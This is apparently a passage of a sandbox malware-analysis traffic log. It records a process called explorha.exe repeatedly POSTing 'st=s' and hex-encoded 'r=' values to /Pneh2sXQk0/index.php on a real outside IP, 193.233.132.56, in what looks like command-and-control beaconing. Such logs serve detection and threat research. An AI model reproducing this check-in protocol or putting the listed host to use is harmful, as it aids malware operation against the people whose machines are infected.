                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:58.092560053 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:58.093727112 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:58.341651917 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49800 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:58.701791048 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:58.946474075 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:58.947127104 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:59.195704937 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49801 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:59.542757034 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:59.784626007 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:59.785403013 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:27:00.030515909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49802 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:00.395750046 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:27:00.645138025 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:00 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:27:00.645859957 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:27:00.902956009 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:00 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49803 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:01.270315886 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:27:01.518929958 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:27:01.519572020 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:27:01.772444010 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49804 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:02.124907017 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:27:02.370692968 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:27:02.386272907 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:27:02.636826992 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49805 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:02.986154079 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:27:03.233387947 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49806 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:03.484750032 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:27:03.738102913 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49807 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:04.095149040 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:27:04.339741945 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49808 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:04.591358900 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:27:04.843533039 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49809 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:27:05.210040092 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:27:05.458318949 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:27:05.464272022 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Timestamp: Apr 19, 2024 04:27:05.718180895 CEST | Bytes transferred: 196 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID: 74 | Source IP: 192.168.2.4 | Source Port: 49810 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:06.083300114 CEST | Bytes transferred: 158 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Timestamp: Apr 19, 2024 04:27:06.332905054 CEST | Bytes transferred: 219 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session ID: 75 | Source IP: 192.168.2.4 | Source Port: 49811 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:06.585163116 CEST | Bytes transferred: 310 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Timestamp: Apr 19, 2024 04:27:06.834055901 CEST | Bytes transferred: 196 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID: 76 | Source IP: 192.168.2.4 | Source Port: 49812 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:07.189158916 CEST | Bytes transferred: 158 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Timestamp: Apr 19, 2024 04:27:07.434369087 CEST | Bytes transferred: 219 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session ID: 77 | Source IP: 192.168.2.4 | Source Port: 49813 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:07.695106983 CEST | Bytes transferred: 310 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Timestamp: Apr 19, 2024 04:27:07.948261976 CEST | Bytes transferred: 196 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID: 78 | Source IP: 192.168.2.4 | Source Port: 49814 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:08.300885916 CEST | Bytes transferred: 158 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Timestamp: Apr 19, 2024 04:27:08.546319008 CEST | Bytes transferred: 219 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session ID: 79 | Source IP: 192.168.2.4 | Source Port: 49815 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:08.570480108 CEST | Bytes transferred: 310 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Timestamp: Apr 19, 2024 04:27:08.824134111 CEST | Bytes transferred: 196 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID: 80 | Source IP: 192.168.2.4 | Source Port: 49816 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:09.183873892 CEST | Bytes transferred: 158 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Timestamp: Apr 19, 2024 04:27:09.423971891 CEST | Bytes transferred: 219 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session ID: 81 | Source IP: 192.168.2.4 | Source Port: 49817 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:09.672518015 CEST | Bytes transferred: 310 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09


                                                                                                    Session ID: 82 | Source IP: 192.168.2.4 | Source Port: 49818 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
